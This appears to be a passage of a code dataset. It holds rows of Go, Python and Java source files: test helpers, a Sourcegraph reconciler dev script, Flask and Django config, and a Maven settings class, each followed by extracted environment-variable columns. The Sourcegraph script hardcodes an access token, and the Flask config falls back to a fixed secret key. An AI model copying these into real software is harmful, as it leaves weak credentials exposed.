t.Parallel()
}
func expectCannotConnectGetRequestTo(t *testing.T, host string, port string) {
targetUrl := fmt.Sprintf("http://%s:%s/", host, port)
fmt.Printf("Expecting failed GET to %s\n", targetUrl)
resp, err := http.Get(targetUrl)
if err == nil {
t.Fatalf("Expected error when connecting to %s, got:\n%s", targetUrl, resp)
}
}
func expectSuccessfulGetRequestTo(t *testing.T, host string, port string) string {
targetUrl := fmt.Sprintf("http://%s:%s/", host, port)
return expectSuccessfulGetRequestToUrl(t, targetUrl)
}
func expectSuccessfulGetRequestToUrl(t *testing.T, url string) string {
fmt.Printf("Expecting successful GET to %s\n", url)
resp, err := http.Get(url)
if err != nil {
t.Fatalf("failed to send HTTP GET to %s:\n%v", url, err)
}
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
t.Fatalf("failed reading GET response from %s:\n%v", url, err)
}
response := string(body)
fmt.Printf("Response from %s: %s", url, response)
return response
}
| [
"\"POD_WITH_NO_RULES_IP\"",
"\"POD_REDIRECTS_ALL_PORTS_IP\"",
"\"POD_REDIRECTS_WHITELISTED_IP\"",
"\"POD_DOEST_REDIRECT_BLACKLISTED_IP\"",
"\"POD_DOEST_REDIRECT_BLACKLISTED_IP\"",
"\"POD_WITH_NO_RULES_IP\""
]
| []
| [
"POD_REDIRECTS_WHITELISTED_IP",
"POD_DOEST_REDIRECT_BLACKLISTED_IP",
"POD_WITH_NO_RULES_IP",
"POD_REDIRECTS_ALL_PORTS_IP"
]
| [] | ["POD_REDIRECTS_WHITELISTED_IP", "POD_DOEST_REDIRECT_BLACKLISTED_IP", "POD_WITH_NO_RULES_IP", "POD_REDIRECTS_ALL_PORTS_IP"] | go | 4 | 0 | |
dev/reconciler-test-script/main.go | package main
import (
"bytes"
"context"
"database/sql"
"encoding/json"
"flag"
"fmt"
"log"
"net/http"
"os"
"strings"
"github.com/keegancsmith/sqlf"
"github.com/sourcegraph/sourcegraph/cmd/frontend/graphqlbackend"
"github.com/sourcegraph/sourcegraph/internal/api"
"github.com/sourcegraph/sourcegraph/internal/db/basestore"
"github.com/sourcegraph/sourcegraph/internal/db/dbutil"
)
// This is a test script that I use to manually integration-test the new
// changeset reconciler.
//
// It's pretty self-explanatory, I guess, and I want to keep it around for a bit.
const (
// It's local access token, don't worry.
authHeader = "token 1b13a0a1217377aa9a43d7cc46782f24b648ab0c"
graphqlEndpoint = "http://localhost:3082/.api/graphql" // CI:LOCALHOST_OK
)
var deleteFlag = flag.Bool("del", false, "delete everything campaign-related in the DB before applying new campaign specs")
func main() {
flag.Parse()
if *deleteFlag {
deleteEverything()
}
automationTestingID := getRepositoryID("github.com/sourcegraph/automation-testing")
err := applySpecs(applyOpts{
namespace: "VXNlcjoxCg==", // User:1
campaignSpec: newCampaignSpec("thorstens-campaign", "Updated description of my campaign"),
changesetSpecs: []string{
// `{"baseRepository":"` + automationTestingID + `","externalID":"1"}`,
// `{"baseRepository":"` + automationTestingID + `","externalID":"311"}`,
// `{"baseRepository":"` + automationTestingID + `","externalID":"309"}`,
`{
"baseRepository": "` + automationTestingID + `",
"baseRev": "e4435274b43033cf0c212f61a2c16f7f2210cf56",
"baseRef":"refs/heads/master",
"headRepository": "` + automationTestingID + `",
"headRef":"refs/heads/retrying-changeset-creation",
"title": "The reconciler created this PR",
"body": "The reconciler also created this PR body",
"published": true,
"commits": [{
"message": "Pretty cool new commit message",
"diff":` + fmt.Sprintf("%q", automationTestingDiff) + `}]
}`,
},
})
if err != nil {
log.Fatalf("failed to apply specs: %s", err)
}
err = applySpecs(applyOpts{
namespace: "VXNlcjoxCg==",
campaignSpec: newCampaignSpec("thorstens-2nd-campaign", "This is the second campaign"),
changesetSpecs: []string{
// `{"baseRepository":"` + automationTestingID + `","externalID":"311"}`,
// `{"baseRepository":"` + automationTestingID + `","externalID":"309"}`,
`{
"baseRepository": "` + automationTestingID + `",
"baseRev": "e4435274b43033cf0c212f61a2c16f7f2210cf56",
"baseRef":"refs/heads/master",
"headRepository": "` + automationTestingID + `",
"headRef":"refs/heads/thorstens-2nd-campaign",
"title": "PR in second campaign",
"body": "PR body in second campaign",
"published": true,
"commits": [{
"message": "Pretty commit message",
"diff":` + fmt.Sprintf("%q", automationTestingDiff2) + `}]
}`,
},
})
if err != nil {
log.Fatalf("failed to apply specs: %s", err)
}
}
type applyOpts struct {
namespace string
changesetSpecs []string
campaignSpec string
}
func applySpecs(opts applyOpts) error {
var changesetSpecIDs []string
for i, spec := range opts.changesetSpecs {
fmt.Printf("Creating changesetSpec %d... ", i)
q := fmt.Sprintf(createChangesetSpecTmpl, spec)
res, err := sendRequest(q)
if err != nil {
return err
}
id := res.Data.CreateChangesetSpec.ID
changesetSpecIDs = append(changesetSpecIDs, id)
fmt.Printf("Done. ID: %s\n", id)
}
fmt.Printf("Creating campaignSpec... ")
q := fmt.Sprintf(createCampaignSpecTmpl,
opts.namespace,
opts.campaignSpec,
graphqlIDList(changesetSpecIDs...),
)
res, err := sendRequest(q)
if err != nil {
return fmt.Errorf("failed to create campaign spec: %s\n", err)
}
campaignSpecID := res.Data.CreateCampaignSpec.ID
fmt.Printf("Done. ID: %s\n", campaignSpecID)
fmt.Printf("Applying campaignSpec... ")
q = fmt.Sprintf(applyCampaignTmpl, campaignSpecID)
res, err = sendRequest(q)
if err != nil {
return fmt.Errorf("failed to apply campaign: %s\n", err)
}
campaignID := res.Data.ApplyCampaign.ID
fmt.Printf("Done. Campaign ID: %s\n", campaignID)
return nil
}
const applyCampaignTmpl = `
mutation ApplyCampaign { applyCampaign(campaignSpec: %q) { id } }
`
const createChangesetSpecTmpl = `
mutation CreateChangesetSpec {
createChangesetSpec(changesetSpec: %q) {
... on HiddenChangesetSpec { id }
... on VisibleChangesetSpec { id }
}
}
`
const createCampaignSpecTmpl = `
mutation CreateCampaignSpec {
createCampaignSpec(namespace: %q, campaignSpec: %q, changesetSpecs: %s) {
id
}
}
`
type graphqlPayload struct {
Query string
}
func graphqlIDList(ids ...string) string {
var quoted []string
for _, id := range ids {
quoted = append(quoted, fmt.Sprintf("%q", id))
}
return fmt.Sprintf("[%s]", strings.Join(quoted, ", "))
}
type graphqlResponse struct {
Data struct {
CreateChangesetSpec struct {
ID string
}
CreateCampaignSpec struct {
ID string
}
ApplyCampaign struct {
ID string
}
}
Errors []struct {
Message string
}
}
func sendRequest(query string) (graphqlResponse, error) {
var res graphqlResponse
b := new(bytes.Buffer)
json.NewEncoder(b).Encode(graphqlPayload{Query: query})
req, err := http.NewRequest("POST", graphqlEndpoint, b)
if err != nil {
return res, err
}
req.Header.Add("Authorization", authHeader)
resp, err := http.DefaultClient.Do(req)
if err != nil {
return res, err
}
if err := json.NewDecoder(resp.Body).Decode(&res); err != nil {
return res, err
}
if len(res.Errors) != 0 {
var messages []string
for _, e := range res.Errors {
messages = append(messages, e.Message)
}
list := strings.Join(messages, "\n- ")
return res, fmt.Errorf("graphql errors:\n\t- %s\n", list)
}
return res, nil
}
func newCampaignSpec(name, description string) string {
return fmt.Sprintf(`{
"name": %q,
"description": %q,
"on": [
{"repositoriesMatchingQuery": "lang:go func main"},
{"repository": "github.com/sourcegraph/src-cli"}
],
"steps": [
{
"run": "echo 'foobar'",
"container": "alpine",
"env": {
"PATH": "/work/foobar:$PATH"
}
}
],
"changesetTemplate": {
"title": "Hello World",
"body": "My first campaign!",
"branch": "hello-world",
"commit": {
"message": "Append Hello World to all README.md files"
},
"published": false
}
}`, name, description)
}
const automationTestingDiff = `diff --git test.md test.md
index 52ada66..0aaaf37 100644
--- test.md
+++ test.md
@@ -1 +1,3 @@
-# This is a test
+# This is a test.
+
+And this is another line
`
const automationTestingDiff2 = `diff --git test.md test.md
index 52ada66..0aaaf37 100644
--- test.md
+++ test.md
@@ -1 +1,3 @@
-# This is a test
+# What an amazing test!
+
+And this is another line
`
func deleteEverything() {
ctx := context.Background()
dsn := dbutil.PostgresDSN("sourcegraph", os.Getenv)
db, err := dbutil.NewDB(dsn, "campaigns-reconciler")
if err != nil {
log.Fatalf("failed to initialize db store: %v", err)
}
if _, err := db.ExecContext(ctx, "DELETE FROM changeset_events;"); err != nil {
log.Fatal(err)
}
if _, err := db.ExecContext(ctx, "DELETE FROM changesets;"); err != nil {
log.Fatal(err)
}
if _, err := db.ExecContext(ctx, "DELETE FROM campaigns;"); err != nil {
log.Fatal(err)
}
if _, err := db.ExecContext(ctx, "DELETE FROM changeset_specs;"); err != nil {
log.Fatal(err)
}
if _, err := db.ExecContext(ctx, "DELETE FROM campaign_specs;"); err != nil {
log.Fatal(err)
}
}
func getRepositoryID(name string) string {
dsn := dbutil.PostgresDSN("sourcegraph", os.Getenv)
s, err := basestore.New(dsn, "campaigns-reconciler", sql.TxOptions{})
if err != nil {
log.Fatalf("failed to initialize db store: %v", err)
}
q := sqlf.Sprintf("select id from repo where name = %q", name)
id, ok, err := basestore.ScanFirstInt(s.Query(context.Background(), q))
if err != nil || !ok {
log.Fatalf("querying repository id: %s", err)
}
return string(graphqlbackend.MarshalRepositoryID(api.RepoID(id)))
}
//
// ____ __ ______________ _________ ____ ______
// / __ \/ / / / ____/_ __/ /_ __/ | / __ \/ ____/
// / / / / / / / / / / / / / /| | / /_/ / __/
// / /_/ / /_/ / /___ / / / / / ___ |/ ____/ /___
// /_____/\____/\____/ /_/ /_/ /_/ |_/_/ /_____/
//
//
//
//
//
//
// .,/(##%##(((##
// ,#((#(((((((((((((((((((((((((((((((((((#
// (/////(((((//(((((((((((((////////////////////.
// (///////(((/(//////////////////*//***/***********/
// /**//*///(/((///(/*****************,,**,,**,**,**,,*/
// ********/*///(//////*.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*
// ***********///(////**** ................................,
// .*,**********//////****** .......... ....................,
// *,,,,*****/*,*/////******* . .....................*
// ,,,,,,*,/.....,(#/******,,, .. . .....................,.,.,,
// ,,,,,,,(....,,,,,,,***,*,,,, ................,..,,,,,,,,,,,,*
// ,,,,,,,..&*%.(%&@.,,,***,,** ...........,,,,,,,,,,,,,,,******/
// .,,,,,/..,%,.,/.(,,,,,**,****.,,,,,,,,,,,,,*,****************/
// ..,,,.*. .... *#(,**,,******,*********************///////////(
// ..,,.,* .#.#.,,,,*,**/,******,,*******////////////////////////(
// ,...,,* *#& /,,,,,***.,****,**////////////////////////////////
// ,..,,., /* % #.,,,&,***,**,,,**////////////////////////////////
// ..,..., .,@....,,,,***,,,,,*,,//////////////////////////////*/.
// ......,, .#...,&,**,,,,***,///////////////*****************.
// ......* * %...,,,,,,,,,,,,********************************
// ,......, # &....,.,,,,,,,,************************////////
// ....,,,* / .. ...,,,,,,,,,***/////////////////////////////
// ,.,,,.,,,, ( ...,,,,,,,,,/**//////////////////////////////
// *,,,,,,,,,,,,,,,,,,,,,,,,,/,*******////////////////////////,
// *,,,,,,,,,,,,,*,,,,,,,*,./#********/*/*////////////////////
// ,,,,,,,,,,,,,*,*,*,,,,,/((,***************/**/**/**/******
// ,,,,,,,,,,,,***,**,,*(((#*********************////////**/
// *,,,,,,,,,,,,,**,**(((((.***********/*******************
// .,,,,,,,,,,**,./((((###********************************
// *,,,,,,*,,((###%&@&/********************************.
// ............********************************
// ............/******************************,*
// ...........******************************,,
// .........****,***,*******,,,,,,,,,,,,,,,,,
// .......*,,,,,*,,,,,,.,,,,,,,,,,,.,,,,,**/
// .....,,,..............,,,,***////////////(.
// ... .....,,,***//*/***********//////*
// /*//****************//,
// ./****//,
| []
| []
| []
| [] | [] | go | 0 | 0 | |
cmd/main.go | package main
import (
"context"
"errors"
"fmt"
"os"
"os/signal"
"strings"
"sync/atomic"
"time"
"github.com/rs/zerolog"
"github.com/nitro/lazyraster/v2/internal"
)
func main() {
var (
logger = zerolog.New(os.Stdout).With().Timestamp().Caller().Logger()
cacheBucket = os.Getenv("CACHE_BUCKET")
cacheSecret = os.Getenv("CACHE_SECRET")
urlSigningSecret = os.Getenv("URL_SIGNING_SECRET")
enableDatadog = os.Getenv("ENABLE_DATADOG")
rawStorageBucketRegion = os.Getenv("STORAGE_BUCKET_REGION")
)
if cacheBucket == "" {
logger.Fatal().Msg("Environment variable 'CACHE_BUCKET' can't be empty")
}
if cacheSecret == "" {
logger.Fatal().Msg("Environment variable 'CACHE_SECRET' can't be empty")
}
if urlSigningSecret == "" {
logger.Fatal().Msg("Environment variable 'URL_SIGNING_SECRET' can't be empty")
}
if rawStorageBucketRegion == "" {
logger.Fatal().Msg("Environment variable 'STORAGE_BUCKET_REGION' can't be empty")
}
storageBucketRegion, err := parseStorageBucketRegion(rawStorageBucketRegion)
if err != nil {
logger.Fatal().Msg("Fail to parse the environment variable 'STORAGE_BUCKET_REGION' payload")
}
waitHandlerAsyncError, waitHandler := wait(logger)
client := internal.Client{
Logger: logger,
AsyncErrorHandler: waitHandlerAsyncError,
CacheBucket: cacheBucket,
CacheSecret: cacheSecret,
URLSigningSecret: urlSigningSecret,
EnableDatadog: enableDatadog == "true",
StorageBucketRegion: storageBucketRegion,
}
if err := client.Init(); err != nil {
logger.Fatal().Err(err).Msg("Fail to initialize the client")
}
client.Start()
exitStatus := waitHandler()
ctx, ctxCancel := context.WithTimeout(context.Background(), 10*time.Second)
if err := client.Stop(ctx); err != nil {
ctxCancel()
logger.Fatal().Err(err).Msg("Fail to stop the client")
}
ctxCancel()
os.Exit(exitStatus)
}
func wait(logger zerolog.Logger) (func(error), func() int) {
signalChan := make(chan os.Signal, 2)
var exitStatus int32
asyncError := func(err error) {
logger.Error().Err(err).Msg("Async error happened")
signalChan <- os.Interrupt
atomic.AddInt32(&exitStatus, 1)
}
handler := func() int {
signal.Notify(signalChan, os.Interrupt)
<-signalChan
return (int)(exitStatus)
}
return asyncError, handler
}
func parseStorageBucketRegion(payload string) (map[string]string, error) {
result := make(map[string]string)
for _, segment := range strings.Split(payload, ";") {
fragments := strings.Split(segment, ":")
if len(fragments) != 2 {
return nil, errors.New("invalid payload")
}
region := strings.TrimSpace(fragments[0])
buckets := strings.Split(fragments[1], ",")
if len(buckets) == 0 {
return nil, errors.New("expected at least one bucket")
}
for _, bucket := range buckets {
result[strings.TrimSpace(bucket)] = region
}
}
if len(result) == 0 {
return nil, fmt.Errorf("fail to parse the storage bucket region")
}
return result, nil
}
| [
"\"CACHE_BUCKET\"",
"\"CACHE_SECRET\"",
"\"URL_SIGNING_SECRET\"",
"\"ENABLE_DATADOG\"",
"\"STORAGE_BUCKET_REGION\""
]
| []
| [
"URL_SIGNING_SECRET",
"CACHE_BUCKET",
"CACHE_SECRET",
"STORAGE_BUCKET_REGION",
"ENABLE_DATADOG"
]
| [] | ["URL_SIGNING_SECRET", "CACHE_BUCKET", "CACHE_SECRET", "STORAGE_BUCKET_REGION", "ENABLE_DATADOG"] | go | 5 | 0 | |
tests/conftest.py | import pytest
@pytest.fixture()
def loop(event_loop):
""" Shortcut """
return event_loop
| []
| []
| []
| [] | [] | python | null | null | null |
apiview_1/wsgi.py | """
WSGI config for apiview_1 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'apiview_1.settings')
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
strava_analysis/analyze_data/analyze_data.py | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime as date
import os
import sys
import utils.analyze_data_utils as analyze_data_utils
import utils.general_utils as general_utils
# import strava_analysis.utils.analyze_data_utils as analyze_data_utils
# import strava_analysis.utils.general_utils as general_utils
def run():
# investigates relationship between speed and distance
analyze_data_utils.speed_vs_distance(os.environ['combined_activities'])
# investigates max speed over time
analyze_data_utils.max_speed_over_time(os.environ['combined_activities'])
# investigates avg speed over time
analyze_data_utils.avg_speed_over_time(os.environ['combined_activities'])
# compares two time frames data
analyze_data_utils.compare_time_frames(os.environ['combined_activities'],
start_1 = '2019-07-01',
end_1 = '2020-04-01',
start_2 = '2020-10-03',
end_2 = '2021-04-26')
# investigating kudo
analyze_data_utils.kudo_analysis(os.environ['new_activities_clean'])
| []
| []
| [
"combined_activities",
"new_activities_clean"
]
| [] | ["combined_activities", "new_activities_clean"] | python | 2 | 0 | |
config.py | import os
from dotenv import load_dotenv
basedir = os.path.abspath(os.path.dirname(__file__))
load_dotenv()
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guess'
# SQL
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or 'sqlite:///' + os.path.join(basedir, 'app.db')
SQLALCHEMY_TRACK_MODIFICATIONS = False
# Email
MAIL_SERVER = os.environ.get('MAIL_SERVER')
MAIL_PORT = int(os.environ.get('MAIL_PORT') or 25)
MAIL_USE_TLS = os.environ.get('MAIL_USE_TLS') is not None
MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
ADMINS = ['[email protected]']
# Pagination
POSTS_PER_PAGE = 3
# Localisation
LANGUAGES = ['en', 'es', 'fr']
AZURE_TRANSLATOR_KEY = os.getenv('AZURE_TRANSLATOR_KEY')
AZURE_TRANSLATOR_LOCATION = 'global'
TRANSLATION_ENDPOINT = "https://api.cognitive.microsofttranslator.com"
# Elasticsearch
ELASTICSEARCH_URL = os.environ.get('ELASTICSEARCH_URL') | []
| []
| [
"MAIL_SERVER",
"MAIL_PASSWORD",
"DATABASE_URL",
"MAIL_PORT",
"SECRET_KEY",
"MAIL_USERNAME",
"MAIL_USE_TLS",
"AZURE_TRANSLATOR_KEY",
"ELASTICSEARCH_URL"
]
| [] | ["MAIL_SERVER", "MAIL_PASSWORD", "DATABASE_URL", "MAIL_PORT", "SECRET_KEY", "MAIL_USERNAME", "MAIL_USE_TLS", "AZURE_TRANSLATOR_KEY", "ELASTICSEARCH_URL"] | python | 9 | 0 | |
fabric/fabric-maven/src/main/java/io/fabric8/maven/util/MavenConfigurationImpl.java | /*
* Copyright 2007 Alin Dreghiciu.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied.
*
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.fabric8.maven.util;
import java.io.File;
import java.net.Authenticator;
import java.net.MalformedURLException;
import java.net.PasswordAuthentication;
import java.net.URL;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.HashMap;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import io.fabric8.common.util.NullArgumentException;
import io.fabric8.maven.url.ServiceConstants;
import org.apache.maven.settings.Profile;
import org.apache.maven.settings.Repository;
import org.apache.maven.settings.Settings;
import org.apache.maven.settings.building.DefaultSettingsBuilder;
import org.apache.maven.settings.building.DefaultSettingsBuilderFactory;
import org.apache.maven.settings.building.DefaultSettingsBuildingRequest;
import org.apache.maven.settings.building.SettingsBuildingException;
import org.apache.maven.settings.building.SettingsBuildingRequest;
import org.apache.maven.settings.building.SettingsBuildingResult;
import org.ops4j.util.property.PropertyResolver;
import org.ops4j.util.property.PropertyStore;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* Service Configuration implementation.
*
* @author Alin Dreghiciu
* @see MavenConfiguration
* @since August 11, 2007
*/
public class MavenConfigurationImpl extends PropertyStore implements MavenConfiguration {
/**
* Logger.
*/
private static final Logger LOGGER = LoggerFactory.getLogger(MavenConfigurationImpl.class);
/**
* The character that should be the first character in repositories property in order to be
* appended with the repositories from settings.xml.
*/
private final static String REPOSITORIES_APPEND_SIGN = "+";
/**
* Repositories separator.
*/
private final static String REPOSITORIES_SEPARATOR = ",";
/**
* Use a default timeout of 5 seconds.
*/
private final static String DEFAULT_TIMEOUT = "5000";
/**
* Configuration PID. Cannot be null or empty.
*/
private final String m_pid;
/**
* Property resolver. Cannot be null.
*/
private final PropertyResolver m_propertyResolver;
private Settings settings;
/**
* Creates a new service configuration.
*
* @param propertyResolver
* propertyResolver used to resolve properties; mandatory
* @param pid
* configuration PID; mandatory
*/
public MavenConfigurationImpl(final PropertyResolver propertyResolver, final String pid) {
NullArgumentException.validateNotNull(propertyResolver, "Property resolver");
m_pid = pid == null ? "" : pid + ".";
m_propertyResolver = propertyResolver;
settings = buildSettings(getLocalRepoPath(propertyResolver), getSettingsPath(),
useFallbackRepositories());
}
@Override
public PropertyResolver getPropertyResolver() {
return m_propertyResolver;
}
public boolean isValid() {
return m_propertyResolver.get(m_pid + ServiceConstants.REQUIRE_CONFIG_ADMIN_CONFIG) == null;
}
/**
* @see MavenConfiguration#isOffline()
*/
public boolean isOffline() {
if (!contains(m_pid + ServiceConstants.PROPERTY_OFFLINE)) {
return set(
m_pid + ServiceConstants.PROPERTY_OFFLINE,
Boolean.valueOf(m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_OFFLINE)));
}
return get(m_pid + ServiceConstants.PROPERTY_OFFLINE);
}
/**
* @see MavenConfiguration#getCertificateCheck()
*/
public boolean getCertificateCheck() {
if (!contains(m_pid + ServiceConstants.PROPERTY_CERTIFICATE_CHECK)) {
return set(
m_pid + ServiceConstants.PROPERTY_CERTIFICATE_CHECK,
Boolean.valueOf(m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_CERTIFICATE_CHECK)));
}
return get(m_pid + ServiceConstants.PROPERTY_CERTIFICATE_CHECK);
}
/**
* Returns the URL of settings file. Will try first to use the url as is. If a malformed url
* encountered then will try to use the url as a file path. If still not valid will throw the
* original Malformed URL exception.
*
* @see MavenConfiguration#getSettingsFileUrl()
*/
public URL getSettingsFileUrl() {
if (!contains(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE)) {
String spec = m_propertyResolver.get(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE);
if (spec == null) {
spec = safeGetFile(System.getProperty("user.home") + "/.m2/settings.xml");
}
if (spec == null) {
spec = safeGetFile(System.getProperty("maven.home") + "/conf/settings.xml");
}
if (spec == null) {
spec = safeGetFile(System.getenv("M2_HOME") + "/conf/settings.xml");
}
if (spec != null) {
try {
return set(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE, new URL(spec));
}
catch (MalformedURLException e) {
File file = new File(spec);
if (file.exists()) {
try {
return set(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE, file.toURI()
.toURL());
}
catch (MalformedURLException ignore) {
// ignore as it usually should not happen since we already have a file
}
}
else {
LOGGER
.warn("Settings file ["
+ spec
+ "] cannot be used and will be skipped (malformed url or file does not exist)");
set(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE, null);
}
}
}
}
return get(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE);
}
private String safeGetFile(String path) {
if (path != null) {
File file = new File(path);
if (file.exists() && file.canRead() && file.isFile()) {
try {
return file.toURI().toURL().toExternalForm();
}
catch (MalformedURLException e) {
// Ignore
}
}
}
return null;
}
public List<MavenRepositoryURL> getDefaultRepositories() throws MalformedURLException {
if (!contains(m_pid + ServiceConstants.PROPERTY_DEFAULT_REPOSITORIES)) {
// look for repositories property
String defaultRepositoriesProp = m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_DEFAULT_REPOSITORIES);
// build repositories list
final List<MavenRepositoryURL> defaultRepositoriesProperty = new ArrayList<MavenRepositoryURL>();
if (defaultRepositoriesProp != null && defaultRepositoriesProp.trim().length() > 0) {
String[] repositories = defaultRepositoriesProp.split(REPOSITORIES_SEPARATOR);
for (String repositoryURL : repositories) {
defaultRepositoriesProperty.add(new MavenRepositoryURL(repositoryURL.trim()));
}
}
LOGGER.trace("Using default repositories [" + defaultRepositoriesProperty + "]");
return set(m_pid + ServiceConstants.PROPERTY_DEFAULT_REPOSITORIES,
defaultRepositoriesProperty);
}
return get(m_pid + ServiceConstants.PROPERTY_DEFAULT_REPOSITORIES);
}
/**
* Repository is a comma separated list of repositories to be used. If repository acces requests
* authentication the user name and password must be specified in the repository url as for
* example http://user:[email protected]/maven2.<br/>
* If the repository from 1/2 bellow starts with a plus (+) the option 3 is also used and the
* repositories from settings.xml will be cummulated.<br/>
* Repository resolution:<br/>
* 1. looks for a configuration property named repository;<br/>
* 2. looks for a framework property/system setting repository;<br/>
* 3. looks in settings.xml (see settings.xml resolution). in this case all configured
* repositories will be used including configured user/password. In this case the central
* repository is also added. Note that the local repository is added as the first repository if
* exists.
*
* @see MavenConfiguration#getRepositories()
* @see MavenConfiguration#getLocalRepository()
*/
public List<MavenRepositoryURL> getRepositories() throws MalformedURLException {
if (!contains(m_pid + ServiceConstants.PROPERTY_REPOSITORIES)) {
// look for repositories property
String repositoriesProp = m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_REPOSITORIES);
// if not set or starting with a plus (+) get repositories from settings xml
if ((repositoriesProp == null || repositoriesProp.startsWith(REPOSITORIES_APPEND_SIGN))
&& settings != null) {
String init = (repositoriesProp == null) ? "" : repositoriesProp.substring(1);
StringBuilder builder = new StringBuilder(init);
Map<String, Profile> profiles = settings.getProfilesAsMap();
for (String activeProfile : getActiveProfiles(true)) {
Profile profile = profiles.get(activeProfile);
if (profile == null) {
continue;
}
for (Repository repo : profile.getRepositories()) {
if (builder.length() > 0) {
builder.append(REPOSITORIES_SEPARATOR);
}
builder.append(repo.getUrl());
builder.append("@id=");
builder.append(repo.getId());
if (repo.getReleases() != null && !repo.getReleases().isEnabled()) {
builder.append("@noreleases");
}
if (repo.getSnapshots() != null && repo.getSnapshots().isEnabled()) {
builder.append("@snapshots");
}
if (repo.getReleases() != null && repo.getReleases().isEnabled()) {
if (repo.getReleases().getUpdatePolicy() != null) {
builder.append("@releasesUpdate=").append(repo.getReleases().getUpdatePolicy());
}
if (repo.getReleases().getChecksumPolicy() != null) {
builder.append("@releasesChecksum=").append(repo.getReleases().getChecksumPolicy());
}
}
if (repo.getSnapshots() != null && repo.getSnapshots().isEnabled()) {
if (repo.getSnapshots().getUpdatePolicy() != null) {
builder.append("@snapshotsUpdate=").append(repo.getSnapshots().getUpdatePolicy());
}
if (repo.getSnapshots().getChecksumPolicy() != null) {
builder.append("@snapshotsChecksum=").append(repo.getSnapshots().getChecksumPolicy());
}
}
}
}
repositoriesProp = builder.toString();
}
// build repositories list
final List<MavenRepositoryURL> repositoriesProperty = new ArrayList<MavenRepositoryURL>();
if (m_propertyResolver.get(m_pid + ServiceConstants.PROPERTY_LOCAL_REPO_AS_REMOTE) != null) {
MavenRepositoryURL localRepository = getDefaultLocalRepository();
if (localRepository != null) {
repositoriesProperty.add(localRepository);
}
}
if (repositoriesProp != null && repositoriesProp.trim().length() > 0) {
String[] repositories = repositoriesProp.split(REPOSITORIES_SEPARATOR);
for (String repositoryURL : repositories) {
repositoriesProperty.add(new MavenRepositoryURL(repositoryURL.trim()));
}
}
LOGGER.trace("Using remote repositories [" + repositoriesProperty + "]");
return set(m_pid + ServiceConstants.PROPERTY_REPOSITORIES, repositoriesProperty);
}
return get(m_pid + ServiceConstants.PROPERTY_REPOSITORIES);
}
/**
* Returns active profile names from current settings
* @param alsoActiveByDefault if <code>true</code>, also return these profile names that are
* <code><activeByDefault></code>
* @return
*/
private Collection<String> getActiveProfiles(boolean alsoActiveByDefault) {
Set<String> profileNames = new LinkedHashSet<String>(settings.getActiveProfiles());
if (alsoActiveByDefault) {
for (Profile profile : settings.getProfiles()) {
if (profile.getActivation() != null && profile.getActivation().isActiveByDefault()) {
// TODO: check other activations - file/jdk/os/property?
profileNames.add(profile.getId());
}
}
}
return profileNames;
}
public String getGlobalUpdatePolicy() {
final String propertyName = m_pid + ServiceConstants.PROPERTY_GLOBAL_UPDATE_POLICY;
if (contains(propertyName)) {
return get(propertyName);
}
final String propertyValue = m_propertyResolver.get(propertyName);
if (propertyValue != null) {
set(propertyName, propertyValue);
return propertyValue;
}
return null;
}
public String getGlobalChecksumPolicy() {
final String propertyName = m_pid + ServiceConstants.PROPERTY_GLOBAL_CHECKSUM_POLICY;
if (contains(propertyName)) {
return get(propertyName);
}
final String propertyValue = m_propertyResolver.get(propertyName);
if (propertyValue != null) {
set(propertyName, propertyValue);
return propertyValue;
}
return null;
}
/**
* Resolves local repository directory by using the following resolution:<br/>
* 1. looks for a configuration property named localRepository; 2. looks for a framework
* property/system setting localRepository;<br/>
* 3. looks in settings.xml (see settings.xml resolution);<br/>
* 4. falls back to ${user.home}/.m2/repository.
*
* @see MavenConfiguration#getLocalRepository()
*/
public MavenRepositoryURL getLocalRepository() {
if (!contains(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY)) {
// look for a local repository property
String spec = m_propertyResolver.get(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY);
// if not set get local repository from maven settings
if (spec == null && settings != null) {
spec = settings.getLocalRepository();
}
if (spec == null) {
spec = System.getProperty("user.home") + "/.m2/repository";
}
if (spec != null) {
if (!spec.toLowerCase().contains("@snapshots")) {
spec += "@snapshots";
}
spec += "@id=local";
// check if we have a valid url
try {
return set(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY,
new MavenRepositoryURL(spec));
}
catch (MalformedURLException e) {
// maybe is just a file?
try {
return set(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY,
new MavenRepositoryURL(new File(spec).toURI().toASCIIString()));
}
catch (MalformedURLException ignore) {
LOGGER.warn("Local repository [" + spec
+ "] cannot be used and will be skipped");
return set(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY, null);
